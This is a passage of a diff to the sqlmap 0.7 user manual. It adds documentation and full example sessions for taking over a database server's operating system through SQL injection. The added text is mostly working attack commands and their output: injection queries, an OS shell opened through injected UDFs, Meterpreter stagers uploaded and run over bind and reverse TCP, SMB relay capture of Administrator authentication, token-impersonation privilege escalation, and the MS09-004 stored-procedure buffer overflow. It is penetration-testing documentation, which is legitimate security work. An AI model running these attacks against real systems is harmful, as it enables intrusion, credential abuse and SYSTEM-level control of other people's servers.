1),CHAR(117,114,115,75,117,102)), NULL# AND 6574=6574 +[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:21] [INFO] the back-end DBMS operating system is Windows +[hh:mm:21] [DEBUG] cleaning up the database management system +[hh:mm:21] [DEBUG] removing support tables +[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:21] [INFO] testing if current user is DBA +[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE +WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), +1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# AND 19=19 +[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:21] [INFO] checking if sys_exec UDF already exist +[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN +((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)= +CHAR(115,121,115,95,101,120,101,99)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# +AND 4900=4900 +[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds +sys_exec UDF already exists, do you want to overwrite it? [y/N] n +[hh:mm:24] [INFO] checking if sys_eval UDF already exist +[hh:mm:24] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN +((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)= +CHAR(115,121,115,95,101,118,97,108)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# +AND 4437=4437 +[hh:mm:24] [DEBUG] performed 1 queries in 0 seconds +sys_eval UDF already exists, do you want to overwrite it? [y/N] n +[hh:mm:25] [DEBUG] keeping existing sys_exec UDF as requested +[hh:mm:25] [DEBUG] keeping existing sys_eval UDF as requested +[hh:mm:25] [DEBUG] creating a support table to write commands standard output to +[hh:mm:25] [DEBUG] query: DROP TABLE sqlmapoutput +[hh:mm:25] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext) +[hh:mm:25] [INFO] going to use injected sys_eval and sys_exec user-defined functions for +operating system command execution +[hh:mm:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER +os-shell> ipconfig +do you want to retrieve the command standard output? [Y/n] +[hh:mm:29] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('ipconfig')) +[hh:mm:29] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),IFNULL(CAST +(data AS CHAR(10000)), CHAR(32)),CHAR(117,114,115,75,117,102)), NULL FROM sqlmapoutput# AND +7106=7106 +[hh:mm:29] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:29] [DEBUG] query: DELETE FROM sqlmapoutput +command standard output: +--- + +Windows IP Configuration + + +Ethernet adapter Local Area Connection 2: + + Connection-specific DNS Suffix . : localdomain + IP Address. . . . . . . . . . . . : 192.168.1.121 + Subnet Mask . . . . . . . . . . . : 255.255.255.0 +---Default Gateway . . . . . . . . . : 192.168.1.1 + +os-shell> exit +[hh:mm:41] [INFO] cleaning up the database management system +[hh:mm:41] [DEBUG] removing support tables +[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapoutput +do you want to remove sys_exec UDF? [Y/n] n +do you want to remove sys_eval UDF? [Y/n] n +[hh:mm:54] [INFO] database management system cleanup finished +[hh:mm:54] [WARNING] remember that UDF dynamic-link library files saved on the file system +can only be deleted manually + + +

+As you can see from this second example, sqlmap firstly check if the two +user-defined functions are already created, if so, it asks the user if he +wants to recreate them or keep them and save time. Prompt for an out-of-band shell, meterpreter or VNC @@ -3996,12 +4351,251 @@ The techniques implemented are detailed on the white paper Options: --os-pwn, --priv-esc, --msf-path and --tmp-path

-TODO +It is possible to establish an out-of-band TCP stateful channel +between the attacker and the underlying operating system by using the +exploited SQL injection as a stepping stone. This is implemented for MySQL, +PostgreSQL and Microsoft SQL Server. +sqlmap relies on the to perform this attack, so you need to have it already +on your system: it's free and can be downloaded from the homepage. It is +advised to use Metasploit 3.3 development version from the subversion +repository.

-The techniques implemented are detailed on the white paper +Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter. + +

+These techniques are detailed on the white paper . +

+Example on a MySQL 5.0.67 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \ + --os-pwn -v 1 --msf-path /home/inquis/software/metasploit + +[...] +[hh:mm:17] [INFO] the back-end DBMS is MySQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: MySQL >= 5.0.0 + +[hh:mm:17] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:17] [INFO] detecting back-end DBMS version from its banner +[hh:mm:17] [INFO] retrieved: 5.0.67 +[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:23] [INFO] retrieved: C +[hh:mm:23] [INFO] the back-end DBMS operating system is Windows +[hh:mm:23] [INFO] testing if current user is DBA +[hh:mm:23] [INFO] retrieved: 1 +[hh:mm:23] [INFO] checking if sys_exec UDF already exist +[hh:mm:23] [INFO] retrieved: 1 +[hh:mm:24] [INFO] sys_exec UDF already exists, do you want to overwrite it? [y/N] N +[hh:mm:24] [INFO] checking if sys_eval UDF already exist +[hh:mm:24] [INFO] retrieved: 1 +[hh:mm:24] [INFO] sys_eval UDF already exists, do you want to overwrite it? [y/N] N +[hh:mm:24] [INFO] creating Metasploit Framework 3 payload stager +[hh:mm:24] [INFO] which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> 1 +[hh:mm:24] [INFO] which is the back-end DBMS address? [192.168.1.121] 192.168.1.121 +[hh:mm:24] [INFO] which remote port numer do you want to use? [61588] 61588 +[hh:mm:24] [INFO] which payload do you want to use? +[1] Reflective Meterpreter (default) +[2] PatchUp Meterpreter (only from Metasploit development revision 6742) +[3] Shell +[4] Reflective VNC +[5] PatchUp VNC (only from Metasploit development revision 6742) +> 1 +[hh:mm:24] [INFO] which payload encoding do you want to use? +[1] No Encoder +[2] Alpha2 Alphanumeric Mixedcase Encoder +[3] Alpha2 Alphanumeric Uppercase Encoder +[4] Avoid UTF8/tolower +[5] Call+4 Dword XOR Encoder +[6] Single-byte XOR Countdown Encoder +[7] Variable-length Fnstenv/mov Dword XOR Encoder +[8] Polymorphic Jump/Call XOR Additive Feedback Encoder +[9] Non-Alpha Encoder +[10] Non-Upper Encoder +[11] Polymorphic XOR Additive Feedback Encoder (default) +[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder +[13] Alpha2 Alphanumeric Unicode Uppercase Encoder +> 11 +[hh:mm:24] [INFO] creation in progress .................. done +[hh:mm:42] [INFO] compression in progress . quit unexpectedly with return code 1 +[hh:mm:43] [INFO] failed to compress the file because you provided a Metasploit version +above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. +It might only slow down a bit the execution of sqlmap +[hh:mm:43] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe' +[hh:mm:44] [INFO] running Metasploit Framework 3 command line interface locally, wait.. +[hh:mm:44] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. +[*] Please wait while we load the module tree... +[*] Started bind handler +[*] Starting the payload handler... +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:47832 -> 192.168.1.121:61588) + +meterpreter > Loading extension priv...success. +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > ipconfig + +MS TCP Loopback interface +Hardware MAC: 00:00:00:00:00:00 +IP Address : 127.0.0.1 +Netmask : 255.0.0.0 + + + +VMware Accelerated AMD PCNet Adapter +Hardware MAC: 00:0c:29:29:ee:86 +IP Address : 192.168.1.121 +Netmask : 255.255.255.0 + + +meterpreter > pwd +C:\Program Files\MySQL\MySQL Server 5.0\Data +meterpreter > exit + + +

+By default MySQL on Windows runs as SYSTEM, however PostgreSQL +run as a low-privileged user postgres on both Windows and Linux. +Microsoft SQL Server 2000 by default runs as SYSTEM, whereas +Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK +SERVICE and sometimes as LOCAL SERVICE. + +It is possible to provide sqlmap with the --priv-esc option to +abuse Windows access tokens and escalate privileges to SYSTEM +within the Meterpreter session created if the underlying operating system +is not patched against Microsoft Security Bulletin +. +sqlmap performs the + +technique by uploading +local exploit and using it to call the Metasploit's payload stager +executable. sqlmap uses also the Metasploit's Meterpreter + +extension to abused Windows access tokens in conjunction to Churrasco +stand-alone exploit if the user wants so. + +

+Note that this feature is not supported by sqlmap installed from the +DEB package because it relies on Churrasco, which is not explicitly free +software so it has not been included in the package. + +

+This technique is detailed on the white paper +. + +

+Example on a Microsoft SQL Server 2005 Service Pack 0 running as +NETWORK SERVICE on the target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc + +[...] +[hh:mm:17] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:17] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:22] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:22] [INFO] testing if current user is DBA +[hh:mm:22] [INFO] retrieved: 1 +[hh:mm:23] [INFO] checking if xp_cmdshell extended procedure is available, wait.. +[hh:mm:29] [INFO] xp_cmdshell extended procedure is available +[hh:mm:29] [INFO] creating Metasploit Framework 3 payload stager +which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> 3 +which is the local address? [192.168.1.161] +which local port numer do you want to use? [61499] +[hh:mm:54] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload +that can be used to abuse Windows Impersonation Tokens via Meterpreter 'incognito' +extension to privilege escalate +which payload encoding do you want to use? +[1] No Encoder +[2] Alpha2 Alphanumeric Mixedcase Encoder +[3] Alpha2 Alphanumeric Uppercase Encoder +[4] Avoid UTF8/tolower +[5] Call+4 Dword XOR Encoder +[6] Single-byte XOR Countdown Encoder +[7] Variable-length Fnstenv/mov Dword XOR Encoder +[8] Polymorphic Jump/Call XOR Additive Feedback Encoder +[9] Non-Alpha Encoder +[10] Non-Upper Encoder +[11] Polymorphic XOR Additive Feedback Encoder (default) +[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder +[13] Alpha2 Alphanumeric Unicode Uppercase Encoder +> +[hh:mm:58] [INFO] creation in progress .................. done +[hh:mm:16] [INFO] compression in progress . quit unexpectedly with return code 1 +[hh:mm:17] [INFO] failed to compress the file because you provided a Metasploit version +above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. +It might only slow down a bit the execution of sqlmap +[hh:mm:17] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfyahls.exe' +[hh:mm:20] [WARNING] often Microsoft SQL Server 2005 runs as Network Service which has no +Windows Impersonation Tokens within all threads, this makes Meterpreter's incognito +extension to fail to list tokens +do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its +argument so that it will be started as SYSTEM? [Y/n] y +[hh:mm:36] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into +chunks, upload them and recreate the original file out of the binary chunks server-side, +wait.. +[hh:mm:22] [INFO] file chunk 1 written +[14:10:06] [INFO] file chunk 2 written +[14:10:06] [INFO] running Metasploit Framework 3 command line interface locally, wait.. +[*] Please wait while we load the module tree... +[*] Handler binding to LHOST 0.0.0.0 +[*] Started reverse handler +[*] Starting the payload handler... +[14:10:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221) + +meterpreter > +[14:11:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of +Access Tokens availables. Choose which user you want to impersonate by using incognito's +command 'impersonate_token' +Loading extension priv...success. +meterpreter > Loading extension incognito...success. +meterpreter > Server username: NT AUTHORITY\SYSTEM +meterpreter > +Delegation Tokens Available +======================================== +NT AUTHORITY\LOCAL SERVICE +NT AUTHORITY\NETWORK SERVICE +NT AUTHORITY\SYSTEM +W2K3DEV\Administrator +W2K3DEV\IUSR_WIN2003 +W2K3DEV\postgres + +Impersonation Tokens Available +======================================== +NT AUTHORITY\ANONYMOUS LOGON + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > exit + + One click prompt for an out-of-band shell, meterpreter or VNC @@ -4009,12 +4603,158 @@ The techniques implemented are detailed on the white paper Options: --os-smbrelay, --priv-esc and --msf-path

-TODO +If the back-end database management system runs as Administrator +and the underlying operating system is not patched against Microsoft +Security Bulletin , +sqlmap can abuse the universal naming convention (UNC) supported within +all database management systems to force the database server to initiate a +SMB connection with the attacker host, then perform a SMB authentication +relay attack in order to establish a high-privileged out-of-band TCP +stateful channel between the attacker host and the target database +server. +sqlmap relies on 's SMB relay exploit to perform this attack, so you need +to have it already on your system: it's free and can be downloaded from the +homepage. +You need to run sqlmap as root user if you want to perform a SMB +relay attack because it will need to listen on a user-specified SMB TCP +port for incoming connection attempts.

-The techniques implemented are detailed on the white paper +Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter. + +

+This technique is detailed on the white paper . +

+Example on a Microsoft SQL Server 2005 Service Pack 0 running as +Administrator on the target: + + +$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit + +[...] +[hh:mm:11] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:11] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:16] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:16] [WARNING] it is unlikely that this attack will be successful because often +Microsoft SQL Server 2005 runs as Network Service which is not a real user, it does not +send the NTLM session hash when connecting to a SMB service +[hh:mm:16] [INFO] which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> 1 +[hh:mm:16] [INFO] which is the local address? [192.168.1.161] 192.168.1.161 +[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.1.131] 192.168.1.131 +[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907 +[hh:mm:16] [INFO] which payload do you want to use? +[1] Reflective Meterpreter (default) +[2] PatchUp Meterpreter (only from Metasploit development revision 6742) +[3] Shell +[4] Reflective VNC +[5] PatchUp VNC (only from Metasploit development revision 6742) +> 1 +[hh:mm:16] [INFO] which SMB port do you want to use? +[1] 139/TCP (default) +[2] 445/TCP +> 1 +[hh:mm:16] [INFO] running Metasploit Framework 3 console locally, wait.. + + _ _ _ _ + | | | | (_) | + _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ +| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| +| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ +|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| + | | + |_| + + + =[ msf v3.3-dev ++ -- --=[ 392 exploits - 234 payloads ++ -- --=[ 20 encoders - 7 nops + =[ 168 aux + +resource> use windows/smb/smb_relay +resource> set SRVHOST 192.168.1.161 +SRVHOST => 192.168.1.161 +resource> set SRVPORT 139 +SRVPORT => 139 +resource> set PAYLOAD windows/meterpreter/bind_tcp +PAYLOAD => windows/meterpreter/bind_tcp +resource> set LPORT 4907 +LPORT => 4907 +resource> set RHOST 192.168.1.131 +RHOST => 192.168.1.131 +resource> exploit +[*] Exploit running as background job. +msf exploit(smb_relay) > +[*] Started bind handler +[*] Server started. +[*] Received 192.168.1.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 +Service Pack 2 LM: +[*] Sending Access Denied to 192.168.1.131:3242 \ +[*] Received 192.168.1.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows +Server 2003 3790 Service Pack 2 LM: +[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator... +[*] AUTHENTICATED as W2K3DEV\Administrator... +[*] Connecting to the ADMIN$ share... +[*] Regenerating the payload... +[*] Uploading payload... +[*] Created \wELRmcmd.exe... +[*] Connecting to the Service Control Manager... +[*] Obtaining a service manager handle... +[*] Creating a new service... +[*] Closing service handle... +[*] Opening service... +[*] Starting the service... +[*] Removing the service... +[*] Closing service handle... +[*] Deleting \wELRmcmd.exe... +[*] Sending Access Denied to 192.168.1.131:3242 W2K3DEV\Administrator +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Received 192.168.1.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 +Service Pack 2 LM: +[*] Sending Access Denied to 192.168.1.131:3244 \ +[*] Received 192.168.1.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows +Server 2003 3790 Service Pack 2 LM: +[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator... +[*] AUTHENTICATED as W2K3DEV\Administrator... +[*] Ignoring request from 192.168.1.131, attack already in progress. +[*] Sending Access Denied to 192.168.1.131:3244 W2K3DEV\Administrator +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:51813 -> 192.168.1.131:4907) + +Active sessions +=============== + + Id Description Tunnel + -- ----------- ------ + 1 Meterpreter 192.168.1.161:51813 -> 192.168.1.131:4907 + +msf exploit(smb_relay) > [*] Starting interaction with 1... + +meterpreter > [-] The 'priv' extension has already been loaded. +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > exit + +[*] Meterpreter session 1 closed. +msf exploit(smb_relay) > exit + +[*] Server stopped. + + Stored procedure buffer overflow exploitation @@ -4022,12 +4762,104 @@ The techniques implemented are detailed on the white paper Options: --os-bof, --priv-esc and --msf-path

-TODO +If the back-end database management system is not patched against Microsoft +Security Bulletin , +sqlmap can exploit the heap-based buffer overflow affecting +sp_replwritetovarbin stored procedure in order to establish an +out-of-band TCP stateful channel between the attacker host and the +target database server. +sqlmap has its own exploit to trigger the vulnerability, but it relies on + to +generate the shellcode used within the exploit, so you need to have it +already on your system: it's free and can be downloaded from the homepage.

-The techniques implemented are detailed on the white paper +Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter. + +

+This technique is detailed on the white paper . +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-bof -v 1 --msf-path /home/inquis/software/metasploit + +[...] +[hh:mm:09] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:09] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:14] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:14] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' +stored procedure heap-based buffer overflow (MS09-004) +[hh:mm:14] [INFO] fingerprinting the back-end DBMS operating system version and service pack +[hh:mm:14] [INFO] retrieved: 1 +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:15] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2 +[hh:mm:15] [INFO] testing if current user is DBA +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:15] [INFO] checking if xp_cmdshell extended procedure is available, wait.. +[hh:mm:21] [INFO] xp_cmdshell extended procedure is available +[hh:mm:21] [INFO] creating Metasploit Framework 3 multi-stage shellcode for the exploit +which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> +which is the back-end DBMS address? [192.168.1.131] +which remote port numer do you want to use? [39391] 62719 +which payload do you want to use? +[1] Reflective Meterpreter (default) +[2] PatchUp Meterpreter (only from Metasploit development revision 6742) +[3] Shell +[4] Reflective VNC +[5] PatchUp VNC (only from Metasploit development revision 6742) +> +which payload encoding do you want to use? +[1] No Encoder +[2] Alpha2 Alphanumeric Mixedcase Encoder +[3] Alpha2 Alphanumeric Uppercase Encoder +[4] Avoid UTF8/tolower +[5] Call+4 Dword XOR Encoder +[6] Single-byte XOR Countdown Encoder +[7] Variable-length Fnstenv/mov Dword XOR Encoder +[8] Polymorphic Jump/Call XOR Additive Feedback Encoder +[9] Non-Alpha Encoder +[10] Non-Upper Encoder +[11] Polymorphic XOR Additive Feedback Encoder (default) +[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder +[13] Alpha2 Alphanumeric Unicode Uppercase Encoder +> +[hh:mm:50] [INFO] creation in progress .................. done +[hh:mm:08] [INFO] handling DEP +[hh:mm:08] [INFO] the back-end DBMS underlying operating system supports DEP: going to +handle it +[hh:mm:08] [INFO] checking DEP system policy +[hh:mm:09] [INFO] retrieved: OPTIN +[hh:mm:12] [INFO] only Windows system binaries are covered by DEP by default +[hh:mm:12] [INFO] running Metasploit Framework 3 command line interface locally, wait.. +[hh:mm:12] [INFO] triggering the buffer overflow vulnerability, wait.. +[*] Please wait while we load the module tree... +[*] Started bind handler +[*] Starting the payload handler... +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:33765 -> 192.168.1.131:62719) + +meterpreter > Loading extension priv...success. +meterpreter > getuid +Server username: NT AUTHORITY\NETWORK SERVICE +meterpreter > exit + + Miscellaneous @@ -4123,7 +4955,7 @@ Option: --update

It is possible to update sqlmap to the latest stable version available on -its by running it with the --update option. @@ -4140,7 +4972,7 @@ $ python sqlmap.py --update -v 4 [hh:mm:55] [TRAFFIC OUT] HTTP request: GET /doc/VERSION HTTP/1.1 Host: sqlmap.sourceforge.net -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200): @@ -4159,7 +4991,7 @@ X-Pad: avoid browser bug [hh:mm:56] [TRAFFIC OUT] HTTP request: GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1 Host: www.sqlsecurity.com -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0; language=en-US Connection: close @@ -4478,7 +5310,32 @@ vulnerable parameter which is the default behaviour. Option: --cleanup

-This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper for the moment. +It is recommended to clean up the back-end database management system from +sqlmap temporary tables and created user-defined functions when you are +done with owning the underlying operating system or file system. + +

+Example on a PostgreSQL 8.3.5 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/iis/get_int.aspx?id=1" \ + -v 2 --cleanup + +[...] +[hh:mm:18] [INFO] cleaning up the database management system +[hh:mm:18] [DEBUG] removing support tables +[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapoutput +do you want to remove sys_exec UDF? [Y/n] +[hh:mm:20] [DEBUG] removing sys_exec UDF +[hh:mm:20] [DEBUG] query: DROP FUNCTION sys_exec(text) +do you want to remove sys_eval UDF? [Y/n] +[hh:mm:21] [DEBUG] removing sys_eval UDF +[hh:mm:21] [DEBUG] query: DROP FUNCTION sys_eval(text) +[hh:mm:21] [INFO] database management system cleanup finished +[hh:mm:21] [WARNING] remember that UDF shared library files saved on the file system can +only be deleted manually + Disclaimer